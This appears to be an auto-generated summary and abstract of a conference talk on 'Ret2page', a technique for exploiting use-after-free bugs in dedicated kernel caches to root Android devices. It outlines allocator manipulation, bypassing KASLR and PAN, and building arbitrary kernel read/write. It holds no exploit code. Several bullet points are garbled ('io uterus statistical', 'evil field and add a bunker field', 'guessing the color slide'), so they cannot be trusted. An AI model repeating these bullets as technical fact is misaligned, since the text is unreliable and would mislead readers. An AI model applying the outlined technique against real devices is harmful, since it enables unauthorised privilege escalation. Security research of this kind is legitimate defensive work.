Ret2page: The Art of Exploiting Use-After-Free Vulnerabilities in the Dedicated Cache

The presentation discusses the return-to-page exploitation technique and vulnerabilities in Android devices that allow for privilege escalation.

• Drivers can give controlled pages, but it's not universal
• The io uterus statistical can give total control of pages, but it is blocked under the untrusted Apple domain
• Two vulnerabilities in Android devices allow for privilege escalation
• The first vulnerability involves inserting a profile descriptor inside another Evo field descriptor to create an evil field and add a bunker field to it
• The second vulnerability involves guessing the color slide to bypass the k-a-slr mitigation
• The FD table pointer can be controlled to read four bytes at a time
• The aarw primitive can be obtained by controlling the page of a pipe buffer

The speaker successfully rooted the Pixel 2 to 5 and other Android 11 flagship devices using the vulnerabilities discussed in the presentation.

Heap isolation is effective mitigation that reduces the exploitability of certain types of vulnerabilities, especially Use-After-Free. In the Android/Linux kernel, A Use-After-Free vulnerability in a dedicated cache is difficult to exploit because none of the ideal victim objects can be directly allocated in the same cache, and from the Android11-5.4 kernel, CONFIG_SLAB_MERGE_DEFAULT is not set on default, which means dedicated caches are never merged into one to reduce memory fragmentation. Thus, to exploit a UAF vulnerability in a dedicated cache, the technique of cross-cache attack has to be applied. However, since the well-known cross-cache attack techniques are time-consuming and less deterministic, lots of Use-After-Free vulnerabilities in the dedicated cache cause little attention and are recognized as unexploitable bugs.In this talk, I will introduce "Ret2page" - a new and generic exploitation technique. The key idea behind the new exploitation technique is to tame both the SLUB and BUDDY allocator. It aims to reduce time and memory consumption, and improve the success rate of physical page reuse. Moreover, to evaluate the effectiveness of the new exploitation technique and compare it with the well-known cross-cache attack techniques, I will analyze two typical Use-After-Free vulnerabilities fixed last year. Last but not least, to achieve the arbitrary kernel memory R/W ability and gain the root privilege, I will respectively detail how to exploit those two vulnerabilities, bypass the general mitigations(KASLR, PAN, etc), and build the universal Android rooting solutions.During the presentation, I will give the exploit demos of rooting Android flagship devices. In summary, the new and generic exploitation technique and the ideas of exploitation have not been thoroughly presented in any previous talks.